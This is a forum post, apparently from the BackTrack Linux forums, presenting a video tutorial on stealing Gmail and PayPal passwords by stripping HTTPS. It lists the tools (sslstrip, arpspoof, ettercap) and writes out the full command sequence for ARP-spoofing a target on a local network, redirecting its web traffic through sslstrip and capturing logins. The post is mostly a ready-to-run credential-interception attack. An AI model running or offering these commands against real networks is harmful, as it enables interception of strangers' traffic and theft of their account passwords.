Results 1 to 10 of 79

Thread: [Video] How to: Snifff SSL / HTTPS (sslstrip)

Threaded View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Stripping SSL & Sniffing HTTPS (SSLStrip)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
    Download video: http://www.mediafire.com/?nbx8odfabbgf21j

    What is this?

    This video shows that with SSL encryption, it isn't secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.


    How does this work?
    > Performing a 'Man In The Middle' attack therefore all the traffic flows through the attacker.
    > Picks out HTTP traffic from port 80 and then packet redirection / forwarding onto a different port.
    > SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.
    > ettercap then picks out the username & password.


    What do I need?

    > sslstrip
    > arpspoof
    > ettercap
    *all in BackTrack 4 Pre Final*


    Network Setup:
    Targets IP: 192.168.1.6
    Gateway : 192.168.1.1


    Software
    Name: sslstrip
    Version: 0.2
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz

    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: ettercap
    Version: 0.7.3
    Home Page: http://ettercap.sourceforge.net
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download


    Commands:
    Code:
    kate /etc/etter.conf
    >*uncomment redir_command_off in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    ettercap -T -q -i wlan0
    
    sslstrip -a -k -f
    ettercap -T -q -i wlan0
    Notes:
    You could save the packets instead, and then look through it later, in case ettercap doesn't pick up the information you need!

    Song: 16 Bit Lolitas - Nobody Seems To Care
    Video length: 03:55
    Capture length: 4:41

    Blog Post:http://g0tmi1k.blogspot.com/2009/07/...ssl-https.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1659-%5Bvideo%5D-how-snifff-ssl-https-sslstrip.html
    Last edited by g0tmi1k; 03-05-2011 at 04:15 PM.
    Have you...g0tmi1k?

Similar Threads

  1. Sickness - Password Sniffing with SSLStrip.
    By sickness in forum BackTrack Videos
    Replies: 35
    Last Post: 09-17-2010, 01:16 PM
  2. creating BT4 USB persistent video
    By jimmy in forum Beginners Forum
    Replies: 0
    Last Post: 02-12-2010, 11:45 PM
  3. sslstrip w/ My Wired-Wireless Network
    By MassAppeal in forum Beginners Forum
    Replies: 11
    Last Post: 02-11-2010, 05:56 AM
  4. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM
  5. sslstrip v0.7
    By Mr-Protocol in forum Tool Requests
    Replies: 2
    Last Post: 01-18-2010, 06:33 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •